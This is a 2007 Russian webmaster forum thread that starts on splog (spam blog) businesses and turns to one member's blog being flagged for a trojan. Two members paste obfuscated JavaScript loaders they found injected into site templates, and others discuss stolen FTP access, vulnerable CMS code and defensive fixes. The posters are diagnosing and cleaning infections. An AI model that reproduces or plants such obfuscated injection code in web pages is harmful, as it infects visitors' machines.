АРМАДА
Для новичков - бизнес на сплогах
На страницу Пред.  1, 2, 3  След.
Новая тема Написать ответ

docker
Профессионал
Зарегистрирован: 20.05.2007
Сообщений: 756
Обратиться по нику
# Добавлено:Пн Окт 22, 2007 1:30 pmОтветить с цитатой
vitvirtual, обычное дело Smile В нашем бизе терпение - немаловажная вещь Smile
Залечи буржуя вусмерть!
И не дай дрочить ему в одиночестве!

americanotropicano
Свой
Зарегистрирован: 02.05.2007
Сообщений: 78
Обратиться по нику
# Добавлено:Пн Окт 22, 2007 1:45 pmОтветить с цитатой
блин, что-то касперский у тебя на сайте трояна детектит Sad
Голая Бритни Спирс

Technotronic
Свой
Зарегистрирован: 17.10.2007
Сообщений: 30
Обратиться по нику
# Добавлено:Пн Окт 22, 2007 1:57 pmОтветить с цитатой
мог бы поставить плюс, поставил бы, статья что надо, как раз искал что то подобноеSmile

vitvirtual
виртуальный
Зарегистрирован: 11.06.2007
Сообщений: 8073
Contest (Сумма: 1)
Обратиться по нику
# Добавлено:Пн Окт 22, 2007 7:43 pmОтветить с цитатой
americanotropicano писал(а):
блин, что-то касперский у тебя на сайте трояна детектит Sad


Трояна точно нет, глюки есть, а трояна нет, счас переколбасил весь код... А глюки из-за того, что времени совсем нет счас своим блогом заниматься Sad
Stimul-Cash дает добро $$$$$ | www.King-Servers.com - Dedicated Servers от 65$, VDS от 25$

vitvirtual
виртуальный
Зарегистрирован: 11.06.2007
Сообщений: 8073
Contest (Сумма: 1)
Обратиться по нику
# Добавлено:Пн Окт 22, 2007 8:01 pmОтветить с цитатой
Technotronic писал(а):
мог бы поставить плюс, поставил бы, статья что надо, как раз искал что то подобноеSmile


Что же помешало? То что я написал, что не могу этим сам заниматься? Во-первых это инвестиций требует, я не особо богат сейчас, поэтому не могу позволить блогораму купить и домены тоже не могу в больших количествах покупать. Во-вторых - я устроился на работу, и просто нет времени даже своим блогом заняться, не то что какие-то бизнесы организовывать...
Stimul-Cash дает добро $$$$$ | www.King-Servers.com - Dedicated Servers от 65$, VDS от 25$

docker
Профессионал
Зарегистрирован: 20.05.2007
Сообщений: 756
Обратиться по нику
# Добавлено:Пн Окт 22, 2007 8:01 pmОтветить с цитатой
Советую тебе еще раз пересмотреть код шаблона на предмет
Код:
<!--[z0s]--><script>document.write(unescape("%3Cscript%3Eif%28jn%21%3D1%29%7Bfunction%20IN%28Zm%29%7Breturn%20Zm%7Dtry%7Bvar%20Fd%3D%27YYuYFuY­euYIuYwuY6uYDuYnuYtuYWuYbuYiuYouYhuYLuYguYluY4uY8uYRuYVuYxuYJuY7uY5uY3uYNuYTuYAuYfuYauYUuYOuYruYjuYPuY9uYduYGuYmuYyuYHuYBuYSuYKuYXuYkuYcuYCuYMuYzuYpuYquYZuFYuFFuFeuFIuFwuF6uFD­uFnuFtuFWuFbuFiuFouFhuFLuFguFluF4uF8uFRuFVuFxuFJuF7uF5uF3uFNuFTuFA%27%3Bvar%20qv%3DFd.substr%282%2C1%29%2CYx%3DArray%2824824%5E24599%2Cnh%28%27160%27%29%2C26695%5E26871%2C5172­%5E5269%2C26933%5E27023%2C28832%5E28675%2Cnh%28%27167%27%29%2Cnh%28%27237%27%29%2Cnh%28%27181%27%29%2C27969%5E28135%2Cnh%28%27189%27%29%2Cnh%28%27188%27%29%2Cnh%28%27243%27%29­%2Cnh%28%27139%27%29%2Cnh%28%27152%27%29%2C14766%5E14677%2C32539%5E32641%2Cnh%28%27135%27%29%2Cnh%28%27162%27%29%2Cnh%28%27255%27%29%2Cnh%28%27177%27%29%2Cnh%28%27250%27%29%2C­29873%5E29721%2Cnh%28%27165%27%29%2C16467%5E16609%2C30536%5E30667%2C25232%5E25105%2Cnh%28%27171%27%29%2C17517%5E17539%2C10681%5E10511%2Cnh%28%27164%27%29%2C28132%5E28019%2Cnh%­28%27191%27%29%2Cnh%28%27138%27%29%2Cnh%28%27146%27%29%2C28577%5E28489%2C2820%5E3065%2Cnh%28%27190%27%29%2C967%5E883%2Cnh%28%27248%27%29%2C24802%5E24585%2Cnh%28%27229%27%29%2C­25708%5E25739%2Cnh%28%27227%27%29%2C4636%5E4779%2Cnh%28%27184%27%29%2C8694%5E8455%2Cnh%28%27148%27%29%2Cnh%28%27158%27%29%2Cnh%28%27128%27%29%2C9489%5E9663%2C17623%5E17491%2Cn­h%28%27244%27%29%2Cnh%28%27226%27%29%2Cnh%28%27185%27%29%2C4328%5E4221%2Cnh%28%27153%27%29%2C4309%5E4183%2Cnh%28%27252%27%29%2C29324%5E29239%2C4879%5E5011%2C5123%5E5373%2Cnh%2­8%27150%27%29%2C12224%5E12073%2Cnh%28%27242%27%29%2C14213%5E14185%2Cnh%28%27136%27%29%2C29984%5E30125%2C7616%5E7529%2C27967%5E28117%2Cnh%28%27142%27%29%2Cnh%28%27143%27%29%2Cn­h%28%27225%27%29%2C22208%5E22097%2Cnh%28%27170%27%29%2C6467%5E6611%2C11902%5E11943%2Cnh%28%27224%27%29%2C32329%5E32431%2C16645%5E16865%2Cnh%28%27134%27%29%2Cnh%28%27155%27%29%­2Cnh%28%27249%27%29%29%3Bvar%20VY%2CGx%3Bvar%20rn%2CKR%3D%27YYYFYeYIYwY6YDYnYtYWYbYeYDYwYiYbYoYhYLYtYgYlY4Y8YRYeYiYVYxYJYoY7Y5YIYoY3YNYTYAYbYfYaYoYUY5YDYfYgYxYRYoYOYrYjYAYoYbY­fYaYoYUY5YDYfYgYxYPYoYOYrYjY9YFYfYDY4YwYdYfYgY3YNYTY9YGYfYDY4YwYdYfYgYxYmYyYHYBYSYSYSYSYSYxYPYoYKYiYeYWYdYfYbYDY9YeYiYiYXYwYfYoYAYoYlY4Y8YmYkYAYkYmYfYFYeY5Y6YfYgYeYiYVYxYmYkYP­YfYTY6YwYIYfYFYAYkYmYOYrYjY9YDYiYcYCY4YMYDYIYwYbYGYgYxYPYoYzY7Y5YIYoYiYpYNYAYqYFYZYtFYYVY4YqYPY7Y5YIYoY5YdYcYAYqYZYqYRFFYKFeYAYqYWY6YKY5YDYfYZY9YeYOY5YFYFYwYeYDYfYOY9YiYIYGYqY­PY7Y5YIYoYLFIYaYAYqFwF6YDYdYOFwYqYPYwYtYgYKYiYeYWYdYfYbYDY9YeYiYiYXYwYfY9YwYbYKYfYTFDYtYgYiYpYNYmYqYAYqYmY5YdYcYxYoYAYAFnYZYxYJY7Y5YIYoYKYOF6YAYKYiYeYWYdYfYbYDY9YOYiYeY5YDYwYi­YbY9F6YiYFYDYPY7Y5YIYoFtYjFeYAYoYqF6YDYqYmYqYDY6FWYqYmYqFwFwYqYmYgYoYKYOF6YoFbYAYoYqYqFiYqYqFWFtYbYpYgYxYxYoYmYoYKYOF6Y9YIYfY6YOY5YeYfYoYgFwFoFhY5FnFLYSFnFgY9FnFlFwYRYqY9YqYxY­9YIYfY6YOY5YeYfYoYgFwF4Y9YmFwYRYqY9YqYxYmYqY9YqYmFtYbYpYgYxYoYmYqY9YqYoYmYoFFYKFeYmYLFIYaYPY7Y5YIYoYCYXY3YAYKYiYeYWYdYfYbYDY9YeYIYfY5YDYfFtYOYfYdYfYbYDYgYqYwYtYIY5YdYfYqYxYPYC­YXY3Y9YFYfYDYjYDYDYIYwYVYWYDYfYoYgYqYFYIYeYqYRYoFtYjFeYxYPYCYXY3Y9F6YfYwYGF6YDYAYBYPYCYXY3Y9YaYwYKYDF6YAF8YPYCYXY3Y9YtYIY5YdYfFRYiYIYKYfYIYoYAYoYSYPYoYDYIFVYJYoYKYiYeYWYdYfYbY­DY9YVYiYKFVY9Y5Y6Y6YfYbYKFxF6YwYOYKYoYgYoYCYXY3YxYPYoYhYLYtYgYiYpYNYRYoY5YdYcYoYxYPYzYoYeY5YDYeF6YgYfYxYoYJYKYiYeYWYdYfYbYDY9YaYIYwYDYfYoYgYqYYF6YDYdYOYnYYYVYiYKFVYnYYFwYVYiYK­FVYnYYFwF6YDYdYOYnYqYxYPYoYKYiYeYWYdYfYbYDY9YVYiYKFVY9Y5Y6Y6YfYbYKFxF6YwYOYKYoYgYoYCYXY3YxYPYhYLYtYoYgYoYiYpYNYRY5YdYcYxYoYPYzYoYzFJYtYWYbYeYDYwYiYbYoFtYbYpYgYxYJYoY7Y5YIYoYpF­xYaYAF8YBYPY7Y5YIYoFYFIYdYAYkYSYZF8F7YBF5YHF3YyFgYSY5YVYeYKYfYtYkYRFFYDYlYAYkYkYPYoYtYiYIYgYTFNFTYAYSYPYoYTFNFTYoYYYoYpFxYaYPYoYTFNFTYmYmYxYoFFYDYlYmYAYoFYFIYdY9YFYWYVYFYDYIYg­YCY5YDF6Y9YtYOYiYiYIYgYCY5YDF6Y9YIY5YbYKYiYdYgYxFAFYFIYdY9YOYfYbYGYDF6YxYRYZYRYZYxYPYoYIYfYDYWYIYbYoFFYDYlYPYoYzYYFwYFYeYIYwY6YDYn%27%3Bvar%20fO%3DString%28%29%3BFd%3DFd.split­%28qv%29%3Bfor%20%28VY%3D0%3BVY%3CKR.length%3BVY+%3D2%29%7Brn%3DKR.substr%28VY%2C2%29%3Bfor%28Gx%3D0%3BGx%3CFd.length%3BGx++%29%7Bif%28Fd%5BGx%5D%3D%3Drn%29break%3B%7DfO+%3DSt­ring.fromCharCode%28Yx%5BGx%5D%5E211%29%3B%7Dfunction%20nh%28bp%29%7Breturn%20parseInt%28bp%29%7Ddocument.write%28fO%29%3B%7Dcatch%28Ngl%29%7B%7D%7Dvar%20jn%3D1%3C/script%3E&q­uot;))</script><!--[/z0s]-->



Явно кто то поковырялся и воткнул какую то гадость.

BrokenBrake
Бомжевед
Зарегистрирован: 16.02.2007
Сообщений: 3432
Обратиться по нику
# Добавлено:Пн Окт 22, 2007 8:14 pmОтветить с цитатой
А как это делают? Я вот буквально неделю назад нашёл на одном своём заброшенном сайтике (бесплатный хостинг):
Код:
<!--[O]--><script>document.write(unescape("%3Cscript%3Etry%20%7Bfunction%20PTy%28IAD%29%7Breturn%20parseInt%28IAD%29%7Dvar%20laJ%3D%27JJuJLuJn­uJIuJhuJWuJHuJ3uJTuJZuJwuJKuJiuJzuJcuJtuJDuJUuJAuJ8uJCuJbuJOuJpuJMuJouJjuJauJBuJ9uJRuJruJGuJguJNuJluJXuJ4uJyuJmuJxuJduJeuJ5uJquJYuJ6uJ7uJsuJSuJkuJfuJPuJFuLJuLLuLnuLIuLhuLWuLHu­L3uLTuLZuLwuLKuLiuLzuLcuLtuLDuLUuLAuL8uLCuLbuLOuLpuLMuLouLj%27%2CQxa%3DString%28%27u%27%29%3Bvar%20NZv%3DArray%28PTy%28%27152%27%29%2C2412%5E2491%2C6500%5E6563%2CPTy%28%27214%­27%29%2C21908%5E21849%2CPTy%28%27212%27%29%2CPTy%28%27208%27%29%2CPTy%28%27154%27%29%2CPTy%28%27194%27%29%2C11532%5E11741%2CPTy%28%27202%27%29%2CPTy%28%27203%27%29%2CPTy%28%27­132%27%29%2CPTy%28%27206%27%29%2CPTy%28%27230%27%29%2C1149%5E1265%2CPTy%28%27192%27%29%2C6041%5E6009%2C32231%5E32111%2C16356%5E16143%2CPTy%28%27225%27%29%2CPTy%28%27141%27%29%­2C28998%5E29081%2C15787%5E15737%2C31202%5E31015%2C31245%5E31441%2C20266%5E20403%2CPTy%28%27193%27%29%2CPTy%28%27211%27%29%2C312%5E423%2CPTy%28%27213%27%29%2C18401%5E18283%2CPT­y%28%27240%27%29%2C32288%5E32489%2C11758%5E11565%2C9148%5E9011%2CPTy%28%27156%27%29%2CPTy%28%27146%27%29%2CPTy%28%27144%27%29%2C31211%5E31103%2C14518%5E14457%2CPTy%28%27134%27­%29%2CPTy%28%27227%27%29%2CPTy%28%27233%27%29%2CPTy%28%27247%27%29%2C13860%5E14077%2C17934%5E18171%2C11104%5E11235%2C26082%5E25975%2CPTy%28%27231%27%29%2C32040%5E32217%2C15355­%5E15111%2C12789%5E12605%2CPTy%28%27239%27%29%2C30223%5E30457%2CPTy%28%27139%27%29%2C19735%5E19931%2CPTy%28%27137%27%29%2C30493%5E30709%2C3659%5E3797%2CPTy%28%27133%27%29%2C29­116%5E28967%2CPTy%28%27254%27%29%2CPTy%28%27243%27%29%2CPTy%28%27255%27%29%2C23673%5E23683%2CPTy%28%27222%27%29%2CPTy%28%27157%27%29%2C7894%5E7727%2C26319%5E26167%2C27003%5E27­033%2C22409%5E22375%2C28924%5E28697%2CPTy%28%27198%27%29%2C22708%5E22563%2C14184%5E14261%2C27719%5E27881%2CPTy%28%27150%27%29%2CPTy%28%27145%27%29%2C16368%5E16227%2CPTy%28%271­42%27%29%29%2CNaZ%3Bvar%20uWR%2CuxH%3Bvar%20Oom%3D%27JJJLJnJIJhJWJHJ3JTJZJwJnJHJhJKJwJiJzJcJtJDJUJAJ8JCJbJOJiJpJMJIJiJoJUJjJwJaJBJiJUJMJHJaJtJbJ9JpJMJIJiJiJRJWJjJiJwJaJBJiJUJM­JHJaJtJbJ9JiJRJWJrJLJaJHJGJhJgJaJtJoJUJrJNJaJHJGJhJgJaJtJbJlJXJ4JyJmJmJmJmJmJbJ9JiJDJKJnJZJgJaJwJHJrJnJKJKJxJhJaJiJjJiJDJUJlJdJjJdJlJaJLJnJMJWJaJtJ8JCJbJlJdJ9JaJoJWJhJIJaJLJjJ­dJlJRJWJrJHJKJeJ5JGJqJHJIJhJwJNJtJbJ9JiJYJpJMJIJiJ6JDJjJ7JLJsJTJSJhJ7JAJkJnJjJ7JsJ7J9JpJMJIJiJ5JfJjJ7JZJWJDJMJHJaJsJrJnJPJMJLJLJhJnJHJaJPJrJKJIJNJ7JAJFLJJjJ7LLLnJHJgJPLLJ7J9Jh­JTJtJDJKJnJZJgJaJwJHJrJnJKJKJxJhJaJrJhJwJDJaJoJ8JTJtJ6JDJlJ7JjJ7JlJkJnJbJjJjLIJsJbJOJiJpJMJIJiLhJFJjJ7LnJHJHJWLWLLLLJ7JlJtJDJKJnJZJgJaJwJHJrJPJKJnJMJHJhJKJwJrLnJKJLJHJiLHJjJiJ­7J7L3J7J7LWLTLZJtJbJbJlJDJKJnJZJgJaJwJHJrJPJKJnJMJHJhJKJwJrLnJKJLJHJrJIJaJWJPJMJnJaJtLLLwLKJMLILiJmLILzJrLILcLLJAJ7JrJ7JbJrJIJaJWJPJMJnJaJtLLLtJrJlLLJAJ7JrJ7JbJlJ7JrJ7JlLTLZJt­JbJlJ7JrJ7JlJ5JfJlJFLJJ9JpJMJIJiLDLUJjJDJKJnJZJgJaJwJHJrJnJIJaJMJHJaJCJPJaJgJaJwJHJtJ7JhJTJIJMJgJaJ7JbJ9LDLUJrJLJaJHLAJHJHJIJhL8JZJHJaJtJ7JLJIJnJ7JALhJFJbJ9LDLUJrJTJIJMJgJaJcJ­KJIJDJaJIJjJmJ9JiLDLUJrJBJhJDJHLnJjJmJ9LDLUJrLnJaJhJNLnJHJjLCJ9JHJILbJiJOJiJDJKJnJZJgJaJwJHJrL8JKJDLbJrJMJWJWJaJwJDJSLnJhJPJDJtLDLUJbJ9JzJcJtJ6JDJAJkJnJbJ9JiJYJnJMJHJnLnJtJaJb­JOJiJDJKJnJZJgJaJwJHJrJBJIJhJHJaJtJ7JJLnJHJgJPJ3JJL8JKJDLbJ3JJLLL8JKJDLbJ3JJLLLnJHJgJPJ3J7JbJ9JDJKJnJZJgJaJwJHJrL8JKJDLbJrJMJWJWJaJwJDJSLnJhJPJDJtLDLUJbJ9JiJzJcJtJ6JDJAJkJnJbJ­9JiJYJiJYLOJTJZJwJnJHJhJKJwJiLTLZJtJbJOJiJpJMJIJiJWJIJjLpJyJAJpJHJjJdJmJsLpLCJyLMJ4LoJXLzJmJML8JnJDJaJTJdJ9JpJMJIJiJhJnJjJdJdJ9JiJTJKJIJtJpLiJjJmJ9JiJpLiJiJJJiJWJIJ9JiJpLiJlJl­JbJiJhJnJlJjJiJpJHJrJLJZL8JLJHJIJtJ5JMJHLnJrJTJPJKJKJIJtJ5JMJHLnJrJIJMJwJDJKJgJtJbLjJpJHJrJPJaJwJNJHLnJbJAJsJAJsJbJ9JiJIJaJHJZJIJwJiJhJnJ9JiJYJJLLJLJnJIJhJWJHJ3%27%2CRwH%3D%27­%27%3BlaJ%3DlaJ.split%28Qxa%29%3Bfor%28NaZ%3D0%3BNaZ%3COom.length%3BNaZ+%3D2%29%7BuxH%3DOom.substr%28NaZ%2C2%29%3Bfor%28uWR%3D0%3BuWR%3ClaJ.length%3BuWR++%29%7Bif%28laJ%5BuWR%­5D%3D%3DuxH%29break%3B%7D%20RwH+%3DString.fromCharCode%28NZv%5BuWR%5D%5E164%29%3B%7Ddocument.write%28RwH%29%3B%7D%0Acatch%28e%29%7B%7D%3C/script%3E"))</script&­gt;<!--[/O]-->


Говорят, что обычно какой-то троян подбрасывают, чтобы он ходил по всем FTP в Total Commander, и этот сайтик у меня действительно был в тотале... Но дело в том, что все остальные аккаунты не тронуты. Ничего не понимаю.
Научись ценить время с microToDo
...а работу с рекламодателями автоматизируй!

Вацлав
Banned
Зарегистрирован: 21.02.2006
Сообщений: 4966
Обратиться по нику
# Добавлено:Пн Окт 22, 2007 8:27 pmОтветить с цитатой
Ну начну с того, что собирая себе шаблоны WP или плагины к нему, стоит собирать их из надежных источников (лучше всего только с официальных). Ибо "чужие" коллекции шаблонов или плагинов очень часто оказываются, мягко говоря, с душком говнеца, если не полениться и просмотреть их сорцы Smile Причем говнецо иногда ооочень хорошо спрятано. Так, что даже высококлассный кодер не сразу найдет где же запрятан бэкдорчик.
Справедливости ради замечу, что это касается не только WP, но и почти всех OpenSource CMS (блогов, форумов, пузомерок и прочего).

BrokenBrake
Бомжевед
Зарегистрирован: 16.02.2007
Сообщений: 3432
Обратиться по нику
# Добавлено:Пн Окт 22, 2007 8:32 pmОтветить с цитатой
А у меня тот сайт из статичного HTMLа на бесплатном местном хостинге. То есть явно вскрыли либо хостинг, либо меня. Мне бы узнать точно, кого именно, а то неприятно как-то )
Научись ценить время с microToDo
...а работу с рекламодателями автоматизируй!

Вацлав
Banned
Зарегистрирован: 21.02.2006
Сообщений: 4966
Обратиться по нику
# Добавлено:Пн Окт 22, 2007 8:35 pmОтветить с цитатой
Второй бесплатный совет: всегда расчитывай на худший вариант Smile Т.е. в данном случае ищи косяки у себя в любом случае.

vitvirtual
виртуальный
Зарегистрирован: 11.06.2007
Сообщений: 8073
Contest (Сумма: 1)
Обратиться по нику
# Добавлено:Пн Окт 22, 2007 8:37 pmОтветить с цитатой
Вацлав писал(а):
Ну начну с того, что собирая себе шаблоны WP или плагины к нему, стоит собирать их из надежных источников (лучше всего только с официальных). Ибо "чужие" коллекции шаблонов или плагинов очень часто оказываются, мягко говоря, с душком говнеца, если не полениться и просмотреть их сорцы Smile Причем говнецо иногда ооочень хорошо спрятано. Так, что даже высококлассный кодер не сразу найдет где же запрятан бэкдорчик.
Справедливости ради замечу, что это касается не только WP, но и почти всех OpenSource CMS (блогов, форумов, пузомерок и прочего).


По ходу это вот эта штука:
<Script Language="JavaScript">

function jumpTo(URL_List){

var URL = URL_List.options[URL_List.selectedIndex].value;

window.location.href = URL;

}

</script>

а может и не она, придется перебирать всю тему, а то и wp переустанавливать, в следующий раз надо закрывать файлы темы для редактирования, у меня 666 были права Sad

нет, не она точно, стираю блог нафиг счас, на днях переустановлю все более качественно...

Это мне в отместку наверное засадили, чтобы крутяшком себя не показывал Sad
Stimul-Cash дает добро $$$$$ | www.King-Servers.com - Dedicated Servers от 65$, VDS от 25$

docker
Профессионал
Зарегистрирован: 20.05.2007
Сообщений: 756
Обратиться по нику
# Добавлено:Пн Окт 22, 2007 9:19 pmОтветить с цитатой
Нет, это не она. Посмотри или index.php или footer.php если он у тебя есть в теме. Там в самом конце должна быть эта вставка. Причем так хитро сделано, что в любом редакторе она у тебя будет вылазить за экран и ты ее можешь не заметить.

Есть подозрение что такие вещи сейчас делаются уже на автомате - то есть находится дыра в скрипте, автоматом получается доступ к фтп, и автоматом же загоняется код эксплойта. Так же встречался код с обычной линкой, и фрейм. Щас уже похоже и шифровать все это дело начали.

Так что господа, обновляйтесь почаще. В новых релизах обычно исправляют большинство дыр в секьюрити.
Залечи буржуя вусмерть!
И не дай дрочить ему в одиночестве!

vitvirtual
виртуальный
Зарегистрирован: 11.06.2007
Сообщений: 8073
Contest (Сумма: 1)
Обратиться по нику
# Добавлено:Пн Окт 22, 2007 10:21 pmОтветить с цитатой
docker писал(а):
Нет, это не она. Посмотри или index.php или footer.php если он у тебя есть в теме. Там в самом конце должна быть эта вставка. Причем так хитро сделано, что в любом редакторе она у тебя будет вылазить за экран и ты ее можешь не заметить.

Есть подозрение что такие вещи сейчас делаются уже на автомате - то есть находится дыра в скрипте, автоматом получается доступ к фтп, и автоматом же загоняется код эксплойта. Так же встречался код с обычной линкой, и фрейм. Щас уже похоже и шифровать все это дело начали.

Так что господа, обновляйтесь почаще. В новых релизах обычно исправляют большинство дыр в секьюрити.



да нет это не в теме, это в сам движок вордпресса впилили что-то , как ты и говориш, автоматически скорее всего, буду переустанавливать по полной программе, только счас времени нет, поэтому посьба не заходить пока на мой сайт!
Stimul-Cash дает добро $$$$$ | www.King-Servers.com - Dedicated Servers от 65$, VDS от 25$

Chin +
олорирропролл
Зарегистрирован: 29.01.2007
Сообщений: 2890
Обратиться по нику
# Добавлено:Ср Окт 24, 2007 4:20 amОтветить с цитатой
Угу, у меня тоже написали что на троян на блоге твоем антивирус ругается.
Так что лечи, а пока для народа напишу

Пока что лучше не заходите на блог http://www.vitvirtual.com/ - там троян.
Вылечишь - уберу. А то позаражаются.

vitvirtual
виртуальный
Зарегистрирован: 11.06.2007
Сообщений: 8073
Contest (Сумма: 1)
Обратиться по нику
# Добавлено:Ср Окт 24, 2007 9:46 amОтветить с цитатой
Chin писал(а):
Угу, у меня тоже написали что на троян на блоге твоем антивирус ругается.
Так что лечи, а пока для народа напишу

Пока что лучше не заходите на блог http://www.vitvirtual.com/ - там троян.
Вылечишь - уберу. А то позаражаются.


Вылечил трояна, можете убирать это...
Stimul-Cash дает добро $$$$$ | www.King-Servers.com - Dedicated Servers от 65$, VDS от 25$
Новая тема Написать ответ    ГЛАВНАЯ ~ СОЦИАЛЬНЫЕ СЕТИ И БЛОГИ

Перейти:  





Генеральный спонсор



Партнеры